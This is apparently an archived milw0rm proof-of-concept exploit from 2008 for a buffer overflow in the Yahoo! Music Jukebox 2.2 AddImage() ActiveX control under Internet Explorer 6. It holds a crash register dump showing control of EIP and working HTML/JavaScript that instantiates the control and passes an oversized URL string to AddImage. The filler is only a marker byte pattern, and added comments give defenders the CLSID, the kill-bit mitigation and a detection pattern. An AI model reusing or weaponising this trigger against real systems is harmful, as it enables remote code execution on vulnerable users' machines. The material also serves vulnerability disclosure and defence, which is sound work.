<!--
Yahoo! Music Jukebox 2.2 AddImage() ActiveX 0day Remote Buffer Overflow PoC Exploit
Bug discovered by Krystian Kloskowski (h07) <h07@interia.pl>
Product homepage: http://music.yahoo.com/jukebox/
Tested on:..
- Yahoo! Music Jukebox (2.2.2.056)
- MS IE 6

Details:..

----------------------------------------------------------------
Exception C0000005 (ACCESS_VIOLATION reading [41414141])
----------------------------------------------------------------
EAX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EBX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
ECX=41414141: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EDX=7C9037D8: 8B 4C 24 04 F7 41 04 06-00 00 00 B8 01 00 00 00
ESP=03EC1370: BF 37 90 7C 58 14 EC 03-9C FF FB 03 74 14 EC 03
EBP=03EC1390: 40 14 EC 03 8B 37 90 7C-58 14 EC 03 9C FF FB 03
ESI=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EDI=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EIP=41414141: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
--> N/A

Just for fun ;]
-->
<object id="obj" classid="clsid:5F810AFC-BB5F-4416-BE63-E01DD117BD6C"></object>
<script>
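/**
 * Build a string of exactly `len` UTF-16 code units by repeating `payload`.
 *
 * The seed is doubled until it is long enough and then truncated, so the
 * result is always the first `len` code units of `payload` repeated end to end.
 *
 * @param {string} payload - Seed string to repeat.
 * @param {number} len - Wanted length in UTF-16 code units (String.length units).
 * @returns {string} The repeated seed cut to `len` code units; "" when the seed
 *     is empty or `len` is not positive.
 */
function makebuf(payload, len) {
    var buf = payload;

    // An empty seed never grows when doubled, so the loop below would not
    // terminate; return the only sensible result instead.
    if (buf.length === 0) {
        return "";
    }

    // Doubling up to `len` is enough: the truncation below yields the same
    // prefix as growing to twice that size first.
    while (buf.length < len) {
        buf += buf;
    }

    return buf.substring(0, len);
}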
// Crash trigger for the condition recorded in the header comment. The filler
// is a marker value only; nothing below carries executable content.

// Filler length in UTF-16 code units (the unit String.length counts).
var len = 340;

// Two U+4141 code units. Stored as UTF-16 they are the bytes 41 41 41 41,
// the same marker that shows up in ECX and EIP in the header's register dump.
var payload = unescape("%u4141%u4141");

// Method of the ActiveX control that receives the oversized argument.
var target = "AddImage";

var tmp = makebuf(payload, len);

// The long string is passed as the URL argument of AddImage on the control
// created by the <object id="obj"> element. The header reports an access
// violation with EIP=41414141, which indicates the argument overruns a buffer
// inside the control; the control's own code is not visible here.
// NOTE(review): for defenders, the CLSID in the <object> tag identifies the
// affected control. Setting the ActiveX kill bit for that CLSID, or updating
// or removing the product, stops a web page from reaching this method. A page
// that instantiates the CLSID and calls AddImage with a very long URL string
// is the pattern worth matching in web-content inspection.
obj[target]('http://' + tmp, 1);
</script>
# milw0rm.com [2008-02-02]